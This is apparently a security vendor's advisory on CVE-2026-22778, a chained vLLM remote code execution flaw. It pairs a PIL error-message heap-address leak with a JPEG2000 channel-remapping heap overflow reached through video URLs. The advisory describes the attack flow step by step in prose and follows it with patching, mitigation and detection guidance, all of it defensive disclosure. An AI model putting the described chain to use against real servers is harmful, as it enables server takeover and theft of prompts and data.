CVE-2026-22778: Critical vLLM RCE & Server Takeover

Introduction

A critical vulnerability (CVE-2026-22778, CVSS 9.8) was disclosed on February 2, 2026, affecting vLLM, a widely-deployed Python library for serving large language models. The flaw allows unauthenticated attackers to achieve remote code execution by sending a specially crafted video URL to the API. No active exploitation has been publicly confirmed yet, but a detailed technical writeup is available. Organizations running vLLM with multimodal video model support should patch to version 0.14.1 immediately.

Quick Overview

Attribute	Details
CVE	CVE-2026-22778
Severity	Critical (CVSS 9.8)
CWE	CWE-122 (Heap-based Buffer Overflow), CWE-532 (Information Exposure Through Log Files)
Affected Products	vLLM
Affected Versions	>= 0.8.3, < 0.14.1
Attack Vector	Network
Authentication Required	None
Exploit Complexity	Low
User Interaction	None
Active Exploitation	No confirmed reports
PoC Available	Yes (technical details public)
CISA KEV	No
Fix Available	Yes (version 0.14.1+)

What is vLLM?

vLLM is a high-throughput, memory-efficient inference engine for serving large language models in production environments. It has become a widely-adopted solution for organizations deploying LLMs at scale, offering significant performance improvements over alternatives for concurrent workloads. This is why a vulnerability in vLLM carries substantial risk: compromising a vLLM server can provide attackers access to sensitive model data, user prompts, and potentially the broader infrastructure, as these deployments often run on high-value GPU clusters.

Technical Analysis

This vulnerability is a chained exploit combining two distinct weaknesses that together enable reliable remote code execution.

Stage 1: Information Leak for ASLR Bypass

The first vulnerability exists in how vLLM handles errors from the Python Imaging Library (PIL). When an invalid image is submitted to a multimodal endpoint, PIL raises an exception that includes the memory address of a BytesIO object. In vulnerable versions, vLLM returns this error message directly to the client, exposing a heap address. According to the advisory, this leaked address is approximately 10.33 GB before libc in memory, reducing the effectiveness of Address Space Layout Randomization (ASLR) from approximately 4 billion possible combinations down to around 8 guesses. This transforms what would otherwise be a difficult exploitation scenario into a reliable one.

Stage 2: Heap Overflow in JPEG2000 Decoder

The second vulnerability resides in the JPEG2000 decoder bundled with OpenCV’s FFmpeg dependency. vLLM uses OpenCV to process video content, and when decoding JPEG2000-encoded video frames, the decoder honors a “cdef” (channel definition) box that allows remapping of color channels. An attacker can craft a malicious video where the Y (luma) channel data is directed into the U (chroma) buffer. Since the Y buffer is significantly larger than the U buffer (due to chroma subsampling), this causes a heap overflow. For example, in a 150×64 pixel frame, the Y plane contains 9,600 bytes while the U buffer only holds 2,400 bytes, resulting in a 7,200-byte overflow into adjacent heap memory.

Attack Flow

Attacker sends a request to /v1/chat/completions or /v1/invocations with a video_url parameter pointing to an attacker-controlled server
vLLM fetches and downloads the video content
An initial probe with an invalid image leaks a heap address via the PIL error message
A second request delivers the malicious video containing crafted JPEG2000 frames
OpenCV’s JPEG2000 decoder processes the video, triggering the heap overflow
The overflow overwrites a function pointer (such as AVBuffer’s free pointer) with the address of system()
When the buffer is freed, arbitrary commands execute on the server

Affected Versions

Branch	Vulnerable Versions	Fixed Version	Notes
vLLM	>= 0.8.3, < 0.14.1	0.14.1+	Update immediately

Important: Deployments that do not serve video or multimodal models are not affected by this vulnerability. The exploit requires the video processing code path to be reachable.

Threat Status

Exploitation Activity: No confirmed in-the-wild exploitation has been reported as of the disclosure date. However, given the detailed technical writeup available and the critical nature of the vulnerability, exploitation attempts are likely to emerge quickly.

PoC Availability: Technical details sufficient to reproduce the vulnerability have been published in the GitHub Security Advisory. This includes the structure of the malicious cdef box, overflow calculations, and the attack chain methodology.

Attribution: No threat actor attribution has been published.

Why This Matters

This vulnerability is particularly concerning for several reasons.

First, vLLM deployments are high-value targets. Organizations using vLLM are typically running sophisticated AI infrastructure with access to proprietary models, training data, and sensitive user interactions. A compromised vLLM server provides attackers with access to all of this data.

Second, the default configuration amplifies risk. Out-of-the-box vLLM installations do not require authentication, meaning any attacker with network access to the API can attempt exploitation. While API keys can be configured, the vulnerability can be triggered through the invocations route before authentication is validated.

Third, the blast radius extends beyond a single server. vLLM is commonly deployed in clustered environments with GPU resources. Compromising one node can provide a foothold for lateral movement across the broader infrastructure, potentially affecting multiple systems and workloads.

Finally, exploitation is reliable. The information leak component transforms this from a probabilistic attack into a deterministic one, making successful exploitation much more likely once an attacker identifies a vulnerable target.

Remediation

Primary Action

Upgrade vLLM to version 0.14.1 or later immediately. This version includes patches for both the information leak and the underlying heap overflow.

Version-Specific Instructions

Deployment Type	Action
pip installation	pip install –upgrade vllm>=0.14.1
Docker	Update to vllm/vllm-openai:v0.14.1 or later
Source builds	Pull latest from main branch and rebuild

Interim Mitigations

If immediate patching is not possible, consider these temporary measures:

Disable video model endpoints: If your deployment does not require video processing, disable multimodal video support entirely
Restrict network access: Ensure vLLM APIs are not exposed to untrusted networks. Place them behind authentication proxies or VPNs
Enable API authentication: Configure API key authentication to add a barrier to exploitation, though note this does not fully mitigate the vulnerability
Monitor for suspicious requests: Watch for requests containing external video_url parameters, particularly from untrusted sources

Post-Compromise Considerations

If you suspect a vLLM instance may have been compromised:

Isolate the affected system from the network immediately
Preserve logs and memory dumps for forensic analysis
Review all connected systems for signs of lateral movement
Rotate any credentials or API keys that may have been accessible from the compromised host
Audit user prompts and model interactions for potential data exfiltration

Detection Guidance

Network-level indicators

POST requests to /v1/chat/completions or /v1/invocations containing video_url parameters with external URLs
Sequential requests from the same source: first an invalid image probe, then a video request
Outbound connections from vLLM servers to unexpected external hosts

Host-level indicators

Error logs containing PIL exceptions with memory addresses (pattern: BytesIO object at 0x)
Unexpected child processes spawned by the vLLM worker process
OpenCV or FFmpeg decoding errors followed by process crashes or unusual behavior

How Can Orca Help?

The Orca Cloud Security Platform helps customers identify cloud assets running affected vLLM versions and understand real exposure context, including internet accessibility, attack path reachability, and asset criticality. By correlating vulnerability data with runtime configuration and infrastructure context, Orca enables teams to prioritize patching and investigation based on true exploitability and blast radius. Orca’s News Item view highlights affected assets directly, helping security teams focus on the most critical systems first.

Introduction
Quick Overview
What is vLLM?
Technical Analysis
Affected Versions
Threat Status
Why This Matters
Remediation
Detection Guidance
- Network-level indicators
- Host-level indicators
How Can Orca Help?

Introduction
Quick Overview
What is vLLM?
Technical Analysis
Affected Versions
Threat Status
Why This Matters
Remediation
Detection Guidance
- Network-level indicators
- Host-level indicators
How Can Orca Help?

Critical RCE in vLLM Allows Server Takeover via Malicious Video URL (CVE-2026-22778)

Introduction

Quick Overview

What is vLLM?

Technical Analysis

Stage 1: Information Leak for ASLR Bypass